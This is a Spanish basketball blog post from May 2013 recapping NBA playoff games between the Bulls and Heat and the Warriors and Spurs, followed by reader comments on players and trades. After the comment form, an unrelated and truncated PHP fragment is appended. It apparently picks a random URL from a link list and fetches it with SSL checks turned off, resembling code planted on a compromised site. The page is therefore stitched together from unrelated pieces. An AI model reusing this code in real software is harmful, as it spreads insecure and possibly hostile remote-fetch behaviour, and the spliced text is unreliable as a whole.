La Crónica: Épica jornada

07 de May de 2013 por Simon

¡Qué corazón tienen estos Chicago Bulls! Ya alabábamos el gran éxito que suponía con las condiciones padecen el haber superado la primera ronda pero lo que nadie esperaba es que llegaran y a las primeras de cambio fueran capaces de robar el factor cancha a los grandes favoritos, Miami Heat.

El partido comenzó con ambos equipos muy precipitados, lo que nos dejó una primera parte con juego a rachas por ambos equipos, imprecisos, muchos desajustes, sobre todo en la defensa de Miami, justo todo lo contrario a la organización que exhibe Chicago. Ya en la segunda parte ambos equipos se asentaron más y el juego comenzó a estar más controlado y con ambos equipos más acertados comenzaron a verse los mejores minutos del encuentro. Durante el tercer cuarto parecía en algunos momentos que Miami podía romper el partido ante unos Bulls que comenzaban a dar signos de cansancio ante la gran carga de minutos que llevaban alguno de sus jugadores. Pero nada más lejos de la realidad, Chicago respondía una y otra vez a los envites de LebBron & Co. A falta de 2 minutos el marcador se encontraba igualado a 86 y de nuevo parecía que Miami Heat estaba en mejor disposición que Chicago para llevarse el partido, pero ocurrió lo que poca gente esperaba: apagón de Miami y el pequeñín Robinson continuó con su gran noche. Un tiro a media distancia y una penetración pusieron a Chicago 4 arriba. A partir de ahí Nate simplemente tuvo que convertir los tiros libres que concedía Miami para finalizar el partido con un parcial de 10-0 (93-86). Gran partido de todos los jugadores de Chicago Bulls aportando cada uno en una faceta pero sobre todo de Nate Robinson, que se está ganando a pulso no ya un contrato, sino un monumento en el United Center. Ayer fueron 27 puntos y 9 asistencias y sobre todo las canastas en los momentos difíciles. Jimmy Butler y Noah fueron los otros dos destacados de Chicago. 21 puntos y 14 rebotes para Butler, que jugó los 48 minutos del partido sin descanso, y 13 puntos, 11 rebotes y 4 asistencias para Noah.  En Miami, LeBron James estuvo muy solo y eso, sumado a que tampoco vimos su mejor versión, propició la derrota de su equipo. En principio no deberían ponerse nerviosos, pues siguen siendo los grandes favoritos. Es posible, incluso, que el toque de atención les puede venir muy bien para no relajarse, pues ayer algún que otro jugador dio signos de estar despistado y no enfocado al 100% en el partido. 

Si el partido que vivimos en el American Airlines Arena fue espectacular, el partido del AT&T Center lo fue todavía más. Probablemente el mejor partido de lo que llevamos de temporada. Hubo de todo: emoción, grandes jugadas, actuaciones prodigiosas, remontadas y canastas ganadoras.

El partido comenzó con ambos equipos enchufados, con un gran ritmo de juego y de anotación. Los dos conjuntos mantuvieron el ritmo durante el segundo cuarto aunque los Warriors daban la sensación de tener uno de esos días en los que les entra todo y que podían dar la sorpresa. Además, hasta el momento no habían precisado un gran esfuerzo de su estrella, Stephen Curry, que explotó, de nuevo, en un tercer cuarto mágico (y ya van tres en estos Playoffs). Anotó 22 puntos en este periodo y rompió el partido a favor de Golden State, cuyas ventajas llegaron a alcanzar los 18 puntos en este periodo, aunque San Antonio fue capaz de reducirla hasta los 12 antes del inicio del último cuarto. Con 12 puntos arriba y Curry en modo “Jordan”, parecía complicado que la victoria se escapara para los de la bahía, máxime cuando a San Antonio, salvo una canasta de Ginobili, le costó 4 minutos anotar en el último cuarto. A falta de 4:30 para el final San Antonio perdía por 16 puntos y no daba ninguna señal de que hubiera alguna posibilidad de remontar el encuentro. Pero a partir de ahí, Tony Parker se enchufó y lideró a los Spurs a un parcial de 18-2 que igualó el partido a falta de 20 segundos. Stephen Curry no pudo anotar el tiro definitivo, por lo que el partido se marchó a la prórroga. En la prórroga las primeras ventajas fueron para Warriors pero Spurs consiguió darle de nuevo la vuelta al marcador e incluso Ginóbili tuvo el tiro para ganar, que finalmente no anotó. La segunda prórroga fue un intercambio constante de golpes por parte de ambos equipos. A falta de 3 segundos el rookie Kent Bazemore anotaba lo que parecía la canasta definitiva del encuentro pero un triple de Ginobili a falta de un segundo daba la sufrida victoria a los San Antonio Spurs tras dos prórrogas. La gran cantidad de minutos disputados nos deja una hoja de estadísticas soberbia para casi todos los jugadores. Steph Curry demostró de nuevo que es un jugador especial. Ayer a punto estuvo de guiar a su equipo a la victoria con una actuación antológica: 44 puntos, 11 asistencias para el angelito. En San Antonio Spurs el mejor fue Tony Parker con 28 puntos, 8 rebotes y otras tantas asistencias. Vitales también en el partido las aportaciones de Green y Leonard anotando tiros importantes en la remontada y, cómo no, Manu Ginobili volvió a ser el jugador decisivo con el triple que dio por fin la victoria a San Antonio tras dos prórrogas. Hasta ese momento el argentino llevaba 1/8 en tiros de tres puntos. Duncan tuvo problemas estomacales y por eso tuvo que abandonar en varias ocasiones la cancha dirección el vestuario y se perdió muchos minutos importantes.

PREMIOS

MVP: ¿Es más importante Carmelo para los Knicks o Nate Robinson para los Bulls? Cada partido que pasa parece más clara la respuesta. Acabó el partido con 27 puntos y 9 asistencias pero es que en el último cuarto anotó 11 puntos y repartió 6 pases ganadores. En los Spurs Tony Parker acabó con 28 puntos, 8 rebotes y 8 asistencias pero hay que destacar, ante todo, su final de tiempo regular y sus 6 puntos en la 2ª de las prórrogas.

Rookie: Gran partido de Harrison Barnes. Jugó 53 minutos en los que anotó 19 puntos y capturó 12 rebotes.

Sorpresa: Jimmy Butler y Danny Green se convirtieron en los factores “X” de sus equipos. El primero disputó, una vez más, los 48 minutos de partido y lo hizo practicando una buena defensa sobre LeBron James, anotando 21 puntos y capturando 14 rebotes. Por su parte, el jugador de los Spurs anotó 22 puntos incluidos un par de triples claves para la victoria de su equipo.

Decepción: LeBron James saltó prácticamente solo a la cancha. Dwyane Wade se quedó en 14 puntos con un 7 de 16; Chris Bosh anotó 9 puntos con un 3 de 10; Ray Allen también anotó 9 con un 2 de 7; Mario Chalmers se quedó en 5 con un 1 de 5… Vergüenza les debería dar.

Esfuerzo en vano: Stephen Curry y LeBron James probaron el sabor de la derrota a pesar de sus grandes partidos. El base de los Warriors se fue hasta los 44 puntos y además repartió 11 asistencias. El flamante MVP nos dejó otro de sus típicos partidos de 24 puntos, 8 rebotes y 7 asistencias.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

33 comentarios a esta entrada

  1. txusma dice:
    #1

    Dwayne Wade y Chris Bosh son o eran? Ayer preguntaba si los Miami Heat sin Lebron James serían los 5º o 6º del Este y con Wade y Bosh al nivel que vienen mostrando últimamente está claro que no. Sea por problemas físicos, sea pq los mejores tiempos ya pasaron, si Lebron no tiene un mega buen día, estos Heat son batibles.

      Citar

  2. sempren dice:
    #2

    Sí, son batibles, pero con las bajas de sus mayores rivales, sigo viendo muy difícil ganarles en una serie a 7 partidos. Westbrook, Rose, Granger… con ellos sería más factible, aunque muy difícil.
    Bosh mejorará algo, y los secundarios lo mismo.

    ¡Enormes los Bulls!

      Citar

  3. MagicJohnson32 dice:
    #3

    A ver, detalles de la madrugada:

    – No puedes pasarte 10 minutos del último cuarto haciendo la misma jugada (aclarado a LeBron y 1 contra 1), y llegar al final y pretender que Wade, Allen o Bosh te saquen las castañas del fuego. Los mejores minutos de Miami fueron cuando involucraron a Wade. En el 4º, fue todo LeBron, y Wade estuvo desastroso en las pocas apariciones que tuvo.

    – Nate increíble pero me quedo con Jimmy Butler. Además de defender de la mejor manera humanamente posible a LeBron, cuando James se puso en plan apisonadora en el último cuarto fue Butler quien respondió en ataque y metió 11 puntos que salvaron a los Bulls. Estaba el partido en ese punto en el que los Heat hacen un parcial de 15-0 y se acaba, y Butler lo evitó.

    – Boozer y Bosh, tal para cual.

    – Mark Jackson no puede tener a Curry 58 minutos en pista. Ni Ginóbili ni Parker ni leches, el partido lo pierden los Warriors porque Curry no se aguanta los calcetines. Le pitan a Klay Thompson la 6ª a 4 minutos para el final y los Warriors 16 arriba, y a partir de ahí se hunden porque Curry no puede más. Y luego, el triple ganador de Ginóbili es para hacérselo mirar. Un pase que cruza toda la zona para Manu, que está absolutamente solo en una jugada a 3 segundos para el final. En fin, de todos modos la serie pinta preciosa.

      Citar

  4. MagicJohnson32 dice:
    #4

    Ah, y que no se me olvide lo más importante: en la retransmisión americana del Warriors-Spurs, en la TNT, se escuchaba continuamente una señora gritando. No sé si en el D+ también se oía. Era absolutamente insoportable, el grito más agudo que he escuchado nunca. Creo que a todos los perros del área de San Antonio les estallaron los tímpanos.

      Citar

  5. rumbero dice:
    #5

    MagicJohnson32:
    – Nate increíble pero me quedo con Jimmy Butler. Además de defender de la mejor manera humanamente posible a LeBron, cuando James se puso en plan apisonadora en el último cuarto fue Butler quien respondió en ataque y metió 11 puntos que salvaron a los Bulls. Estaba el partido en ese punto en el que los Heat hacen un parcial de 15-0 y se acaba, y Butler lo evitó.

    100% de acuerdo. Fue igual o más importante que Robinson y encima bailando con la más fea TODO el partido. Ojo que el chaval lleva jugando los 48 minutos en los 3 últimos.
    Lo de Nate es para escribir un libro. Le cuentan a Thibo cuando estaba en los Celtics y le tocaba lidiar con él que años después le salvaría el culo día si día también y se echa a reir a más no poder. Dato muy comentado sobre el último cuarto de Nate: El único jugador en 15 años que consigue un 11-6 en PO. Y no voy a dejarme a mi amigo Noah, que sin hacer una salvajada de partido es insustituible en este esquema de los Chicago en los dos lados de la pista. Ahora es cuando a Miami le entrará el calentón y se van a poner serios. Es difícil que el equipo esté tan desaparecido como hoy pese a la defensa que les plantan, pero estos Bulls se parecen un poco a los verdes de la temporada pasada. Fácil no lo van a poner.

    ¿Curry ha metido 22 puntos en el terce cuarto? Está llegando a otro nivel este chaval. Toca ver al menos la segunda mitad del partido

      Citar

  6. Denise dice:
    #6

    txusma: Dwayne Wade y Chris Bosh son o eran? Ayer preguntaba si los Miami Heat sin Lebron James serían los 5º o 6º del Este y con Wade y Bosh al nivel que vienen mostrando últimamente está claro que no. Sea por problemas físicos, sea pq los mejores tiempos ya pasaron, si Lebron no tiene un mega buen día, estos Heat son batibles.

    Calma señores…que Wade y Bosh tampoco son ahora unos Don Nadies.
    Me apostaría lo que sea a que los Bulls ganan los proximos 4 partidos por más de 15 puntos…

      Citar

  7. Denise dice:
    #7

    Denise: Calma señores…que Wade y Bosh tampoco son ahora unos Don Nadies.Me apostaría lo que sea a que los Bulls ganan los proximos 4 partidos por más de 15 puntos…

    Quería decir los Heat…que ganan los proximos 4 por mas de 15.

    Qué pena lo de Warriors :(. Esto psicologicamente marca y te dices para adentro..joder si no ganamos este partido que lo teniamos chupado a 4 minutos, ¿cual vamos a ganar? .
    Mazazo moral para GSW y subidónd e adrenalina para SAS. A ver si Jackson es un buen motivador y psicologo y levanta a sus chicos para salir a muerte a por el segundo partido.

      Citar

  8. HisRoyalAirness dice:
    #8

    MagicJohnson32:
    A ver, detalles de la madrugada:

    – No puedes pasarte 10 minutos del último cuarto haciendo la misma jugada (aclarado a LeBron y 1 contra 1), y llegar al final y pretender que Wade, Allen o Bosh te saquen las castañas del fuego. Los mejores minutos de Miami fueron cuando involucraron a Wade. En el 4º, fue todo LeBron, y Wade estuvo desastroso en las pocas apariciones que tuvo.

    – Nate increíble pero me quedo con Jimmy Butler. Además de defender de la mejor manera humanamente posible a LeBron, cuando James se puso en plan apisonadora en el último cuarto fue Butler quien respondió en ataque y metió 11 puntos que salvaron a los Bulls. Estaba el partido en ese punto en el que los Heat hacen un parcial de 15-0 y se acaba, y Butler lo evitó.

    – Boozer y Bosh, tal para cual.

    – Mark Jackson no puede tener a Curry 58 minutos en pista. Ni Ginóbili ni Parker ni leches, el partido lo pierden los Warriors porque Curry no se aguanta los calcetines. Le pitan a Klay Thompson la 6ª a 4 minutos para el final y los Warriors 16 arriba, y a partir de ahí se hunden porque Curry no puede más. Y luego, el triple ganador de Ginóbili es para hacérselo mirar. Un pase que cruza toda la zona para Manu, que está absolutamente solo en una jugada a 3 segundos para el final. En fin, de todos modos la serie pinta preciosa.

    Venía a escribir esto exactamente. Magic, eres mi alma gemela.

    Cuando a Miami no le salen las rachas de contraataques y se atascan un poco (y, voy a polemizar, los árbitros no ayudan) se ponen en modo Cavs de Mike Brown. Como decía Magic, aclarado a Lebron y a ver qué pasa. Y anda que no se tiene Thibs estudiado cómo defender ese “brillante” planteamiento defensivo.
    Es cierto también que los porcentajes de D-Wade son una trampa que te cagas: ábrete y, si veo que no consigo enchufarla, te la doy los últimos 3 segundos para que te tires una piedra. Siempre lo digo, parece que nos olvidamos muy pronto de los 28-7-8 de Wade en las Finales contra Dallas (las que palmaron), tirando más de un 50% en TC y “Da Choosen One” borrándose como una rata y no llegando a los 20 puntos a pesar que le dejaban dominar el último cuarto. Sin Wade no van a ninguna parte.
    Al margen de esto, ya no sólo el juego interior, sino que la defensa de la pintura de Miami es absolutamente lamentable y ya pueden rezar para encontrarse en las finales con OKC porque la pareja Marc-Randolph o Duncan-Splitter les va a hacer llorar mucho.

    Del otro partido, poco que decir, lo de Curry es un espectáculo pero eso no hay cuerpo que lo aguante (y menos el suyo). Además hay parte de espejismo, Tim no estuvo ni en el último cuarto ni en las prórrogas, y jugó todo el partido lastrado. Si fuese DeJuan Blair pues vale pero es el mejor 4 de la historia einfluye un poquito su presencia.
    Aún así, partido precioso, aunque me gustaría tener una charla con el staff técnico de los Warriors y sus jugadores a ver en qué coño estaban pensando en el triple de Manu. Ginobili abierto y sin marca? No problem, vamos a hacerle una doble marca a Parker en el medio campo para que no reciba con 2 segundos en el crono.

    PD: hay un contraataque de los Heat, creo que en el tercer cuarto, en el que la roba Wade, se la pasa a Lebron y éste hace un 2+1 después de dar 5 O 6 PASOS. Increíble

      Citar

  9. Txusma dice:
    #9

    Yo a Wade jamás le discutiré el talento pero empiezo a verle muy cascado. De hecho, parece que no, pero ya tiene 31 años y un historial de lesiones a su espaldas.

      Citar

  10. Denise dice:
    #10

    Txusma: Yo a Wade jamás le discutiré el talento pero empiezo a verle muy cascado. De hecho, parece que no, pero ya tiene 31 años y un historial de lesiones a su espaldas.

    Ya, yo lo dije hace unos meses, para mi ya no está en la elite de la liga entendiendose como tal si tuviese que formar una plantilla con 15 jugadores, pero sigue siendo un tio muy importante para su equipo.

    Y si lo tuvierais que traspasar este verano para pillar algop por él antes que acabe contrato…que buscariais?
    Otro base-escolta sin tocar el sistema, ó un buen pivot que haga la pintura de Miami mas fuerte haciendo una pareja con Bosh y dejandole todo el perimetro al antojo de Lebron…

      Citar

  11. HisRoyalAirness dice:
    #11

    Traspasar a Wade? amnistiaria a Bosh y pillaria a Howard.
    Y yo no lo veo cascado, sino sin ritmo de juego ni anotador

      Citar

  12. Esteban dice:
    #12

    HisRoyalAirness: Venía a escribir esto exactamente. Magic, eres mi alma gemela.

    Además hay parte de espejismo, Tim no estuvo ni en el último cuarto ni en las prórrogas, y jugó todo el partido lastrado. Si fuese DeJuan Blair pues vale pero es el mejor 4 de la historia einfluye un poquito su presencia.

    Si y del otro lado falta el 4 all-star david lee

    creo que la salida de duncan emparejo las cosas haciendolo mas justo para todos

    a esta altura solo el heat parece tener el equipo completo (creo que grizzlies lo mismo)

      Citar

  13. HisRoyalAirness dice:
    #13

    Esteban: Si y del otro lado falta el 4 all-star david lee

    creo que la salida de duncan emparejo las cosas haciendolo mas justo para todos

    a esta altura solo el heat parece tener el equipo completo (creo que grizzlies lo mismo)

    Bueno Esteban, supongo que eso no ha sido una comparación, no? Es evidente que pierden mucho con Lee lesionado pero es que lo que aporta Tim a en los dos lados de la cancha… es comparar a Dios con un gitano (con perdón)

      Citar

  14. rumbero dice:
    #14

    Wade con la rodilla hecha un cristo sigue siendo de lo mejorcito de la liga, el problema es que es difícil verle jugar una regular entera sin que se resienta. Y eso que este año la acabó jugando de lujo y parecía que llegaba mejor que nunca, pero otra vez problemas. Lo necesitarán los Heat y aparecerá. Seguramente en el próximo, que después de uno malo toca redimirse

      Citar

  15. Denise dice:
    #15

    HisRoyalAirness: Traspasar a Wade? amnistiaria a Bosh y pillaria a Howard.Y yo no lo veo cascado, sino sin ritmo de juego ni anotador

    Amnistiar a Bosh?? Lo dices en serio? A mi Bosh me parece un muy buen jugador, aunque intentaría establecer conversaciones con Blazers para traerme en su lugar a Aldridge…no a pelo, porque Blazers supongo que no aceptaría pero sí en un trade a 3 bandas con un montón de jugadores involucrados.

      Citar

  16. Esteban dice:
    #16

    HisRoyalAirness: Bueno Esteban, supongo que eso no ha sido una comparación, no? Es evidente que pierden mucho con Lee lesionado pero es que lo que aporta Tim a en los dos lados de la cancha…es comparar a Dios con un gitano (con perdón)

    no me parece cierto, duncan fue el mejor 4 de la historia, y lee no puede estar mas lejos que eso

    pero te has quedado en el tiempo, ha pasado tanto agua bajo el punto que duncan ya ni juega de 4!!! y si bine es un enorme jugador aun, nisiquiera es el jugador franquicia de los spurs

    actualidad vs actualidad, duncan y lee estan muy parejos

    carrera vs carrera, no tiene ni sentido compararlas

      Citar

  17. Esteban dice:
    #17

    Denise: no a pelo, porque Blazers supongo que no aceptaría pero sí en un trade a 3 bandas con un montón de jugadores involucrados.

    enserio crees que los blazers no aceptarian a pelo? jajajajaja

    por supuesto que no, seria un chiste si lo hicieran

    la unica forma de traspasar a bosh por aldrigue, es meter en el mismo paquete a norris cole, y 2 selecciones de primera vuelta y ni asi

    quiza bosh y wade por aldrigue

      Citar

  18. Denise dice:
    #18

    Esteban: enserio crees que los blazers no aceptarian a pelo? jajajajaja por supuesto que no, seria un chiste si lo hicieranla unica forma de traspasar a bosh por aldrigue, es meter en el mismo paquete a norris cole, y 2 selecciones de primera vuelta y ni asiquiza bosh y wade por aldrigue

    No lo aceptarían deportivamente, pero ojo que hay muchos trades tambien por motivos economicos. Acuerdate del de Pau por Kwame mas proyectos de jugadores (Marc, Crittenton)…

      Citar

  19. Esteban dice:
    #19

    no creo denise que hay algo positivo en lo economico en traspasar a aldrigue por bosh, quien es mas viejo y cobra mas, simplemente no ntendria sen tido

    tendria mas sentido un aldrigue por una trade execption mas que por bosh con ese contrato

      Citar

  20. Denise dice:
    #20

    Esteban:
    no creo denise que hay algo positivo en lo economico en traspasar a aldrigue por bosh, quien es mas viejo y cobra mas, simplemente no ntendria sen tido

    tendria mas sentido un aldrigue por una trade execption mas que por bosh con ese contrato

    Ninguna ventaja. Pensaba que el año que viene era agente libre, pero qué va!!, tiene dos años más de Player Option de 20,5 y 22 millones hasta 2016!!. (igual que Wade y Lebron) Mirandolo así, ganen Heat el anillo (lo más probable) ó no, deberían plantearse traspasar este verano a Bosh ó a Wade , porque vaya pastizales que les quedan por cobrar, y a la mínima que tengan muchos problemas físicos ó directamente se vengan abajo como fruto de la edad, no van a tener capacidad de reconstruir en muchos años.

      Citar

  21. rumbero dice:
    #21

    Esteban:
    quiza bosh y wade por aldrigue

    ¿¿¿???
    Te has olvidado de meter tb a Matthews, el equipo de cheerleaders de los Blazers y 1000 cajas de whisky de malta de 12 años para que colase

      Citar

  22. MagicJohnson32 dice:
    #22

    rumbero: ¿¿¿???
    Te has olvidado de meter tb a Matthews, el equipo de cheerleaders de los Blazers y 1000 cajas de whisky de malta de 12 años para que colase

    Porque los Blazers no tienen cheerleaders, que no si no, lo veía xD

      Citar

  23. HisRoyalAirness dice:
    #23

    O sea, estoy 3 horas sin conectarme, vuelvo y leo:

    Traspaso Wade + Bosh por Aldrigde (???????????)

    Duncan y Lee están parejos.

    Chavales, vosotros antes molabais

      Citar

  24. Lucho dice:
    #24

    HisRoyalAirness:
    O sea, estoy 3 horas sin conectarme, vuelvo y leo:

    Traspaso Wade + Bosh por Aldrigde (???????????)

    Duncan y Lee están parejos.

    Chavales, vosotros antes molabais

    Agree

      Citar

  25. Lucho dice:
    #25

    Esta muy mal aplicar la frase “nunca subestimes el corazón de un campeón” a los Bulls de Thibodeau?
    Pregunto por la literidad, aquello de que no son campeones…

      Citar

  26. Esteban dice:
    #26

    Lo de wade y bosh por aldrigue ra una foma de decir lo desparejo que serria un tade mano a mano bosh por aldrigue a secas

    Q dundan y lee son ambos all star este año es u dato objetivo, mas alla q n jugen en la misma posicion

      Citar

  27. Sancho88 dice:
    #27

    Veo que ya estáis enterrando un año más a D-Wade… pobrecicos por dudar de él. Miami, como dice Denise, se va a llevar la serie. Con este susto no creo que 4-1, pero sí 4-2. Y estaba dentro de lo previsible, a ver si os creeis que los puestos en semifinales de conferencia los regalan. Miami se pondrá las pilas, activará a Wade y Bosh y barrerán la serie como siempre.

      Citar

  28. Sancho88 dice:
    #28

    Y por cierto, el OESTE MOLA MÁS!!!!! Que diría Ali-G. El Este es más aburrido que ver un partido de Euroliga, y no lo digo por los Bulls que son los únicos que le están poniendo chicha. Decidme dónde llegarían (excepto Heat, obviamente), Pacers o Knicks en el Oeste. Pregunto…

    Ah, y para los seguidores neoyorquinos (que hay un puñao en la sala)… id pensando en el año que viene, porque Indiana se va a llevar la serie segurísimo. Miami-Indiana en las finales

      Citar

  29. Sancho88 dice:
    #29

    Y para terminar, si Popo no hace el gilipoyas con la rotación de pívots y da descanso a Thimotías, Spurs pueden poner el quinto anillo en el anillo Timotiano sin ningún problema

      Citar

  30. Ruxixón dice:
    #30

    Como fan de LeBron sólo puedo decir que siento….envidia de ese equipo de los Bulls.No sé qué clase de química existe entre los jugadores,cómo cala el mensaje de Thibo en sus pupilos pero la definición de SEÑOR EQUIPO es decir Chicago Bulls.Una auténtica heroicidad aunque se lleven un 4-1 en las semis.

    Pensaba que se las daban muy felices en Miami y San Antonio por haber finiquitado sus series de manera tan larga pero ese eterno descanso les ha salido rana,y mientras unos iban con el espíritu competitivo a cuestas otros han tardado en arrancar.Pero han despertado y tanto en una como en otra serie los favoritos siguen siendo los mismos.

    Nate es puro amor,en un minuto te dan ganas de matarlo y en el siguiente le petas un beso en los morros,jajaja,qué pavo.Y Butler…yo en este chico le veo la mirada y creo que puede ser muy grande,no sé,son sensaciones.No tiene el tiro más fiable del mundo ni parece que sea una máquina anotadora pero hay algo oculto ahí que todavía no se ha visto y viendo su ética de trabajo creo que en Chicago pueden desarrollarlo muchísimo más.

      Citar

  31. rumbero dice:
    #31

    HisRoyalAirness:
    O sea, estoy 3 horas sin conectarme, vuelvo y leo:

    Traspaso Wade + Bosh por Aldrigde (???????????)

    Duncan y Lee están parejos.

    Chavales, vosotros antes molabais

    Y lo que es peor, Magic negando la existencia de las las famosas “BlazerDancers”

      Citar

  32. Denise dice:
    #32

    Sancho88:

    Ah, y para los seguidores neoyorquinos (que hay un puñao en la sala)… id pensando en el año que viene, porque Indiana se va a llevar la serie segurísimo. Miami-Indiana en las finales

    Bueno..yo no estaría tan seguro, yo confío en NY, mejores jugadores, mas experiencia, mas banquillo. Para el segundo partido creo ademas que vuelve Amare.

    Hablando de Indiana, viendo lo que han conseguido los Pacers sin Granger….este verano podrían traspasarlo, no? No sé porqué siempre me han gustado los Pacers como un posible destino de Pau, ademas tengo ganas de verlo en la Conferencia Este donde podría aumentar sus números.

      Citar

  33. HisRoyalAirness dice:
    #33

    Parcial de 25-2 en el último cuarto para los Knicks. Como decimos en mi tierra: “mi madriña”

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>